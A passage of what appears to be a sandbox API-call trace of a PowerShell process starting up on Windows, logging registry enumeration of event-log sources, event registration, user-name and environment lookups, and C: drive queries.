	[0405.195] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x5, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.195] CoTaskMemFree (pv=0x41e820) 
	[0405.195] CoTaskMemFree (pv=0x0) 
	[0405.195] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.195] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x6, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.195] CoTaskMemFree (pv=0x41e820) 
	[0405.195] CoTaskMemFree (pv=0x0) 
	[0405.195] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.195] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x7, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.195] CoTaskMemFree (pv=0x41e820) 
	[0405.195] CoTaskMemFree (pv=0x0) 
	[0405.195] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.195] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x8, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.195] CoTaskMemFree (pv=0x41e820) 
	[0405.195] CoTaskMemFree (pv=0x0) 
	[0405.195] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x328) returned 0x0
	[0405.195] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.196] RegOpenKeyExW (in: hKey=0x324, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x344) returned 0x0
	[0405.196] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.196] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x348) returned 0x0
	[0405.196] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.196] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x34c) returned 0x0
	[0405.196] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.196] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x350) returned 0x0
	[0405.196] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.196] RegOpenKeyExW (in: hKey=0x324, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x354) returned 0x0
	[0405.196] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.196] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x358) returned 0x0
	[0405.197] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.197] RegOpenKeyExW (in: hKey=0x324, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x35c) returned 0x0
	[0405.197] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.197] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x360) returned 0x0
	[0405.197] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x364) returned 0x0
	[0405.197] RegCloseKey (hKey=0x364) returned 0x0
	[0405.197] RegCloseKey (hKey=0x324) returned 0x0
	[0405.198] RegCloseKey (hKey=0x360) returned 0x0
	[0405.198] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d258 | out: phkResult=0x26d258*=0x360) returned 0x0
	[0405.198] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d1cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d1cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.199] CoTaskMemFree (pv=0x0) 
	[0405.199] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.199] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x41e820, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.199] CoTaskMemFree (pv=0x41e820) 
	[0405.199] CoTaskMemFree (pv=0x0) 
	[0405.199] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.199] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x41e820, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.199] CoTaskMemFree (pv=0x41e820) 
	[0405.199] CoTaskMemFree (pv=0x0) 
	[0405.199] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.199] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x41e820, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.199] CoTaskMemFree (pv=0x41e820) 
	[0405.199] CoTaskMemFree (pv=0x0) 
	[0405.199] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.199] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x41e820, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.199] CoTaskMemFree (pv=0x41e820) 
	[0405.199] CoTaskMemFree (pv=0x0) 
	[0405.199] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.199] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x41e820, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.199] CoTaskMemFree (pv=0x41e820) 
	[0405.199] CoTaskMemFree (pv=0x0) 
	[0405.199] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.199] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x41e820, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.199] CoTaskMemFree (pv=0x41e820) 
	[0405.199] CoTaskMemFree (pv=0x0) 
	[0405.200] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.200] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x41e820, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.200] CoTaskMemFree (pv=0x41e820) 
	[0405.200] CoTaskMemFree (pv=0x0) 
	[0405.200] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.200] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x41e820, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.200] CoTaskMemFree (pv=0x41e820) 
	[0405.200] CoTaskMemFree (pv=0x0) 
	[0405.200] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.200] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x41e820, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.200] CoTaskMemFree (pv=0x41e820) 
	[0405.200] CoTaskMemFree (pv=0x0) 
	[0405.200] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x324) returned 0x0
	[0405.200] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0405.200] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x364) returned 0x0
	[0405.200] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0405.200] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x368) returned 0x0
	[0405.200] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0405.201] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x36c) returned 0x0
	[0405.201] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0405.201] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x370) returned 0x0
	[0405.201] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0405.201] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x374) returned 0x0
	[0405.201] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0405.201] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x378) returned 0x0
	[0405.201] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0405.201] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x37c) returned 0x0
	[0405.201] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0405.201] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x380) returned 0x0
	[0405.202] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x384) returned 0x0
	[0405.202] RegCloseKey (hKey=0x384) returned 0x0
	[0405.202] RegCloseKey (hKey=0x360) returned 0x0
	[0405.202] RegCloseKey (hKey=0x380) returned 0x0
	[0405.209] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba70008
	[0405.602] ReportEventW (hEventLog=0x1ba70008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3119bd0*="WSMan", lpRawData=0x3119940) returned 1
	[0405.603] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0405.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.603] CoTaskMemFree (pv=0x46a6b0) 
	[0405.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.606] CoTaskMemAlloc (cb=0x804) returned 0x1b97a6a0
	[0405.606] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b97a6a0, nSize=0x26d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d548) returned 0x1
	[0405.606] CoTaskMemFree (pv=0x1b97a6a0) 
	[0405.606] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.606] GetUserNameW (in: lpBuffer=0x41e820, pcbBuffer=0x26d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d588) returned 1
	[0405.606] CoTaskMemFree (pv=0x41e820) 
	[0405.607] ReportEventW (hEventLog=0x1ba70008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x311f5b0*="Alias", lpRawData=0x311f340) returned 1
	[0405.608] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0405.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.608] CoTaskMemFree (pv=0x46a6b0) 
	[0405.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.610] CoTaskMemAlloc (cb=0x804) returned 0x1b97a6a0
	[0405.611] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b97a6a0, nSize=0x26d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d548) returned 0x1
	[0405.611] CoTaskMemFree (pv=0x1b97a6a0) 
	[0405.611] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.611] GetUserNameW (in: lpBuffer=0x41e820, pcbBuffer=0x26d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d588) returned 1
	[0405.611] CoTaskMemFree (pv=0x41e820) 
	[0405.612] ReportEventW (hEventLog=0x1ba70008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3124ba8*="Environment", lpRawData=0x3124938) returned 1
	[0405.613] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0405.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.613] CoTaskMemFree (pv=0x46a6b0) 
	[0405.614] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0405.614] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0405.614] CoTaskMemFree (pv=0x46a6b0) 
	[0405.614] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0405.614] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0405.614] CoTaskMemFree (pv=0x46a6b0) 
	[0405.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x26d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0405.615] SetErrorMode (uMode=0x1) returned 0x1
	[0405.615] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x26d300 | out: lpFileInformation=0x26d300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0405.615] SetErrorMode (uMode=0x1) returned 0x1
	[0405.616] GetLogicalDrives () returned 0x4
	[0405.616] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26ce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0405.617] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0405.617] SetErrorMode (uMode=0x1) returned 0x1
	[0405.617] CoTaskMemAlloc (cb=0x68) returned 0x49bd40
	[0405.617] CoTaskMemAlloc (cb=0x68) returned 0x49bcd0
	[0405.617] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x49bd40, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x26d2d0, lpMaximumComponentLength=0x26d2cc, lpFileSystemFlags=0x26d2c8, lpFileSystemNameBuffer=0x49bcd0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26d2d0*=0x9c354b42, lpMaximumComponentLength=0x26d2cc*=0xff, lpFileSystemFlags=0x26d2c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0405.617] CoTaskMemFree (pv=0x49bd40) 
	[0405.617] CoTaskMemFree (pv=0x49bcd0) 
	[0405.617] SetErrorMode (uMode=0x1) returned 0x1
	[0405.617] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0405.618] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0405.618] SetErrorMode (uMode=0x1) returned 0x1
	[0405.618] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d270 | out: lpFileInformation=0x26d270*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0405.618] SetErrorMode (uMode=0x1) returned 0x1
	[0405.618] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0405.618] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0405.619] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0405.619] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0405.619] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0405.620] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0405.620] SetErrorMode (uMode=0x1) returned 0x1
	[0405.620] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d0a0 | out: lpFileInformation=0x26d0a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0405.620] SetErrorMode (uMode=0x1) returned 0x1
	[0405.620] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0405.620] SetErrorMode (uMode=0x1) returned 0x1
	[0405.620] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d0a0 | out: lpFileInformation=0x26d0a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0405.620] SetErrorMode (uMode=0x1) returned 0x1
	[0405.621] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0405.621] SetErrorMode (uMode=0x1) returned 0x1
	[0405.621] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d140 | out: lpFileInformation=0x26d140*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0405.621] SetErrorMode (uMode=0x1) returned 0x1
	[0405.621] CoTaskMemAlloc (cb=0x804) returned 0x1b97a6a0
	[0405.621] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b97a6a0, nSize=0x26d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d548) returned 0x1
	[0405.622] CoTaskMemFree (pv=0x1b97a6a0) 
	[0405.622] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.622] GetUserNameW (in: lpBuffer=0x41e820, pcbBuffer=0x26d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d588) returned 1
	[0405.622] CoTaskMemFree (pv=0x41e820) 
	[0405.623] ReportEventW (hEventLog=0x1ba70008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x312bc98*="FileSystem", lpRawData=0x312ba28) returned 1
	[0405.624] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0405.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.624] CoTaskMemFree (pv=0x46a6b0) 
